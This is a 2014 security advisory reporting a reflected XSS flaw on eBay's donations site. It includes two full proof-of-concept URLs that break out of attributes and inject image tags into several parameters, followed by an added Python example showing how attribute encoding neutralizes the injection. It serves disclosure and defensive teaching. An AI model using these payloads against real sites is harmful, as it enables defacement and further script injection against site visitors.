donations.ebay.com XSS over 1 year 0day

2014-05-29 / 2014-05-30
Credit: Kacper
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Reported and unpatched over 1yr! SHAME!

[XSS] donations.ebay.com
Author: Kacper
WWW: https://devilteam.pl/

PoC:
https://donations.ebay.com/donation/FNPController?ACTION=BrowseAction&SUB_ACTION=GetSearchResult&ebay_user_id=h1dddd&site_id=null&search_statement=1&v=e8b1e4e4e4e4fcb1b4b1b7b4b6b4b4b1b5b0b0b0fceed9abf3c8dab2d"><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">0f2c2ede4eab6f7d6eed9abf3c5dab2d0f2c1b2e4eab6c1c6ecb4e1e8c4b5e1c5f1c1abe4eab6f8b9eed9abf3e5d1bdbdfcb0&a="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">&name="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">

https://donations.ebay.com/donation/FNPController?ACTION=BrowseAction&SUB_ACTION=GetSearchResult&ebay_user_id=h1dddd&site_id=null&search_statement=1&v=e8b1e4e4e4e4fcb1b4b1b7b4b6b4b4b1b5b0b0b0fceed9abf3c8dab2d0f2c2ede4eab6f7d6eed9abf3c5dab2d0f2c1b2e4eab6c1c6ecb4e1e8c4b5e1c5f1c1abe4eab6f8b9eed9abf3e5d1bdbdfcb0&a="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">&name="><img src="http://www.freepasswordmanager.com/wp-content/uploads/2012/12/Youve_Been_Hacked.jpg">

Reference: https://devilteam.pl/viewtopic.php?f=16&t=11554

References:

https://devilteam.pl/viewtopic.php?f=16&t=11554
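
Added example (not part of the advisory or of eBay's code): why the `">` prefix in the `v`, `a` and `name` parameters yields markup injection, and how attribute-context output encoding neutralizes it. It assumes the parameters are echoed into an HTML attribute value, which the advisory does not show; the `render` and `parse` helpers and the `img.example` host are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample: the parameter names and the '">' breakout prefix follow
# the PoC above; the hex fragments and image host are shortened placeholders.
SAMPLE_QUERY = (
    'ACTION=BrowseAction&v=e8b1"><img src="http://img.example/x.jpg">0f2c'
    '&a="><img src="http://img.example/x.jpg">'
    '&name="><img src="http://img.example/x.jpg">'
)
REFLECTED = ("v", "a", "name")  # parameters carrying markup in the PoC


def render(query, encode):
    """Echo the reflected parameters into hidden-input value attributes.

    Assumption: the page reflects them into an attribute context.
    encode=False models the flawed output, encode=True the corrected one.
    """
    params = parse_qs(query)
    fields = []
    for key in REFLECTED:
        value = params.get(key, [""])[0]
        if encode:
            # Attribute context: the quote must be escaped as well as < and >.
            value = html.escape(value, quote=True)
        fields.append(f'<input type="hidden" name="{key}" value="{value}">')
    return "<form>" + "".join(fields) + "</form>"


class _Collector(HTMLParser):
    """Records every start tag and the value attribute of each input."""

    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.values.append(dict(attrs).get("value"))


def parse(markup):
    """Return (start tags, input values) as an HTML parser sees the markup."""
    collector = _Collector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.values
```

Parsing the unencoded output shows three `img` elements that the server never intended to emit; with encoding, the same input stays inside the `value` attributes and round-trips unchanged.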


Copyright 2024, cxsecurity.com